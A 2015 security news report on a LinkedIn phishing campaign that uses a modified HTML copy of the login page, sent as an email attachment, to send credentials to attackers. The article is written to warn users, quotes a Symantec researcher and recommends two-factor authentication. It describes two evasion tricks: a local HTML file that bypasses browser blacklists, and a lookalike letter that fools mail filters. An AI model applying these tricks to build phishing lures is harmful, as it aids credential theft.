Crooks use interesting methods to evade detection

Jan 15, 2015 15:11 GMT  ·  By
Local copy of the LinkedIn log-in page looks exactly like the real deal
3 photos
   Local copy of the LinkedIn log-in page looks exactly like the real deal

In a recent phishing campaign aimed at harvesting LinkedIn credentials, unsuspecting users are tricked into revealing their username and password for the service via an HTML file.

Phishing campaigns are a common thing, but this one recorded a surge over the last week, which prompted security researchers to investigate the cybercriminal operation.

They found that the fraudulent emails contained an HTML file attached that featured the same code as the LinkedIn log-in page, save for one aspect: the information in the log-in fields would be directed to the attackers.

Browser anti-phishing protection is bypassed

Tricking the recipient into launching the web page is done by informing them that irregular activities have been spotted in connection to their LinkedIn account and that a “compulsory security update” needs to be performed, which is available in the attached form.

“The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” says in a blog post Satnam Narang, senior security response manager with Symantec.

Using an HTML file for phishing is particularly significant because the user is no longer protected by the blacklists with the dangerous websites that are used by web browsers to prevent users from landing in a fraudulent location.

Email filters circumvented, 2FA recommended

Narang also noticed that the cybercrooks modified the LinkedIn name in the email and did not use the capital “i” but a lowercase “l,” which helps the message escape detection of mail filters, without users noticing the difference.

Important to note is that the malicious actor made the effort to evade automatic detection and even to have a long-lasting phishing page; but users should note that web services do not perform security updates, or any other type of updates, by sending emails to clients.

Symantec advises turning on the two-factor authentication (2FA) security feature for the LinkedIn account; this is done from the privacy and security settings of the profile and ensures that, even if the username and password are lost, a third code sent to the owner’s phone needs to be entered in order to log in from an untrusted machine.

LinkedIn phishing (3 Images)

Local copy of the LinkedIn log-in page looks exactly like the real deal
Code that sends credentials to the attackerEmail with fraudulent HTML file attached
Open gallery